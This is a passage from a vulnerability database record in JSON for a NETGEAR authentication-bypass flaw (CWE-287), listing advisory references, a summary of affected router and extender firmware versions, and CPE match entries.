"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/zer0yu/CVE_Request/blob/master/netgear/netgear_cgi_unauthorized_access_vulnerability.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/zer0yu/CVE_Request/blob/master/netgear/netgear_cgi_unauthorized_access_vulnerability.md"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-24 15:15
Modified
2024-11-21 04:03
Severity ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1.78, JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d1500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "47DB7AAC-5EE3-4912-A44F-C9D5BF42B01C",
"versionEndExcluding": "1.0.0.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d1500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "78DC8809-C26D-48D8-9E12-228C3669B824",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B5A5FCA-6198-4DF7-B395-F266C2B6270C",
"versionEndExcluding": "1.0.0.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE070E3-C0B1-455F-83A9-5C60C489816F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2ECEA129-164C-4C80-A81E-9688F4AC3583",
"versionEndExcluding": "1.0.0.57",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B8AA0851-BFD5-45F6-9673-CA4B83D8B844",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD763D04-70A0-4A50-8866-330B82703680",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB2B81-08D9-4C81-B6DE-8D1FCAEC485A",
"versionEndExcluding": "1.0.1.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB24F17D-A9A8-4EF9-BF53-580395D60EFC",
"versionEndExcluding": "1.0.1.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5E70AF3-FFD8-4ACD-9F4C-DB03BFB1125A",
"versionEndExcluding": "1.0.3.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FCA60A85-77FF-41BF-89FA-7EB3ACFECDB8",
"versionEndExcluding": "1.0.0.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5C27C8A-1B80-47CD-B015-14588F4F8732",
"versionEndExcluding": "1.0.0.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex2700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C309FEFF-5FB1-41BB-B9C5-97CFAC29892C",
"versionEndExcluding": "1.0.1.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex2700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5341B659-DE7D-43F1-954D-82049CBE18AD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B79CB764-3B62-4C39-9B68-A7C949EA91BE",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C578B9-6D52-492F-854F-067EB36F84B1",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "520E4E2B-FF48-4B11-8A41-975B1A5E9FA2",
"versionEndExcluding": "1.0.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4707A6F6-9586-47FF-8E1A-55D950D8CE19",
"versionEndExcluding": "1.0.2.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2AC81E61-E8CD-4929-A1E2-C1B620BCC3E7",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A5E1BEB0-8AA0-423B-A0A2-966341402819",
"versionEndExcluding": "1.0.0.34_1.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "46452E97-9347-4788-9570-1EECECC7255E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C96EDAD-1985-4AB7-9FF1-C67A5D274C99",
"versionEndExcluding": "1.0.3.82_1.1.117",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "66120328-5681-46E5-86A5-CAC62B9243B9",
"versionEndExcluding": "1.0.1.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1289BBB4-1955-46A4-B5FE-BF11153C24F5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "274A58AC-3E28-411B-8495-2ADD184CFAE6",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "974F3120-1A73-4301-A720-E31C9C27B41C",
"versionEndExcluding": "1.0.1.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F285D60D-A5DA-4467-8F79-15EF8135D007",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0005DB1D-49BA-4099-89DC-5B4C9AA8BF6F",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jnr1010:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "CCE79B3F-8667-43C9-962D-EE089428F144",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B5D8AD4-6C67-4DC7-99DF-B29DBA4BC376",
"versionEndExcluding": "1.0.1.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jwnr2010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8D0FEB73-5572-48DE-86BE-055364878989",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jwnr2010:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "7399E5E9-40D8-4ECD-8B7B-C96A27E10282",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:pr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6E111C4B-C1D5-403A-A35F-D538E16D0E23",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:pr2000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2451CC0C-71B2-474D-93F0-2B2ACD802FE3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB4D669D-D6C4-403E-896D-55EE4EEB7C27",
"versionEndExcluding": "1.0.1.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "01A66936-4268-4990-8E83-24C74A75B9F6",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F44A123-B256-428B-98C2-17570F2F32DC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E464FF8D-6202-40BA-9740-9CCE2BC23607",
"versionEndExcluding": "1.1.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2DD089FE-0DBF-4C3B-AA02-3A0A27CF9D76",
"versionEndExcluding": "1.0.4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E43DA92A-E429-459F-8B34-DDED55F5590B",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9A5FD9A-5AE9-46A2-A1E6-C7BF84EFAD22",
"versionEndExcluding": "1.0.2.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC332E60-A7DB-41C5-B1ED-FE3EDF83F8BC",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D21ACC48-8B3D-4A0B-BA04-C9709835A66A",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A8D2A56D-4AAA-4E55-AE7A-E343EA9D6133",
"versionEndExcluding": "1.2.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "819CC65F-F5DA-4620-BC68-CAAA2B73195D",
"versionEndExcluding": "1.0.9.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E7FE05C-8ACF-4D53-A6D9-2C99673CE41A",
"versionEndExcluding": "1.2.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB388895-B579-43B7-A88E-4BD28D41F6E2",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F0EE8EBA-C4CD-4CA1-A684-54338B1254A9",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7F227D99-88C9-457F-BCA5-665F531E04AB",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EF3B3F26-401C-4ED0-B871-4B4F8521F369",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9ACBF492-1315-46CF-8297-E239DDB14B6B",
"versionEndExcluding": "1.0.3.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E0DFBF4-E393-44AE-AEF9-1B2059EE5AE8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE1B60E4-C8FA-4094-9F05-1746A01557D9",
"versionEndExcluding": "1.0.2.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B72579C-51F1-4F16-8FDE-544229C25B07",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7393D4D7-F607-423E-917E-FE520D7A3A73",
"versionEndExcluding": "1.0.3.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DAAB159C-27F2-4645-9FE4-4DBB4465DE3A",
"versionEndExcluding": "1.0.2.104",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A79D8A77-4555-4B2A-8F19-F69AD4A17D2E",
